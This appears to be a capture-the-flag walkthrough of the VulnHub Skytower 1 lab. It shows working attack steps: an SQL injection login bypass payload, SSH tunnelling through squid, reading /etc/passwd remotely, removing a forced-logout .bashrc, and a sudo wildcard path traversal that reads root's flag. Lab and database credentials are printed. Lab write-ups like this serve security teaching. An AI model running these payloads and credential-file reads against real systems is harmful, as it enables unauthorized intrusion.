Skytower 1 boot2root

URL: http://vulnhub.com/entry/skytower-1,96/

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-28 23:18 EEST  
Nmap scan report for 192.168.74.134  
Host is up (0.00075s latency).  
Not shown: 997 closed ports  
PORT     STATE    SERVICE  
22/tcp   filtered ssh  
80/tcp   open     http  
3128/tcp open     squid-http  

Let's examine the port 80:
skytower

Sql injection ??

Let's try to find out:

Post request:

email=&password='  

Result:

There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]  

Post data of the malicious request.

email='*'&password='*'  

sql_injection

For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john  
Email:[email protected]  
Password: hereisjohn  

SSH port is filtered and squid is installed in the server. I added in the ~/.ssh/config file the following 2 lines:

Host 192.168.74.134  
  ProxyCommand corkscrew 192.168.74.134 3128 %h %p

So i am using corkscrew to have ssh connection over squid.

Logging in:

ssh [email protected]

Response:

Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent  
permitted by applicable law.  
Last login: Sat Jun 28 17:18:32 2014 from 192.168.74.134

Funds have been withdrawn  
Connection to 192.168.74.134 closed.  

It logins normally but i don't have the time to execute a command. Then, i tried:

ssh [email protected] "cat /etc/passwd"

I found 2 more users in the passwd file:

john:x:1000:1000:john,,,:/home/john:/bin/bash  
sara:x:1001:1001:,,,:/home/sara:/bin/bash  
william:x:1002:1002:,,,:/home/william:/bin/bash  

Now, i know the email format of the company([email protected]), i can try the other usernames to the first form.

Post request

[email protected]&password='*'  

Username: sara
Password: ihatethisjob

Post request

[email protected]&password='*'  

Username: william
Password: senseable

In order to have shell, i should change the .bashrc file that closes the connection.

ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"  

After logging in, i typed sudo -l

sudo -l  
Matching Defaults entries for sara on this host:  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:  
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The use of asterisks in sudoers file is dangerous as here.

sudo ls /accounts/../root/  
flag.txt
sudo cat /accounts/../root/flag.txt  
Congratz, have a cold one to celebrate!  
root password is theskytower  

AAnd we are root! It was an entry level boot2root but it has some unique 'features' like the use of squid.


Mysql credentials as a bonus:

cat /var/www/login.php | grep mysql  
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');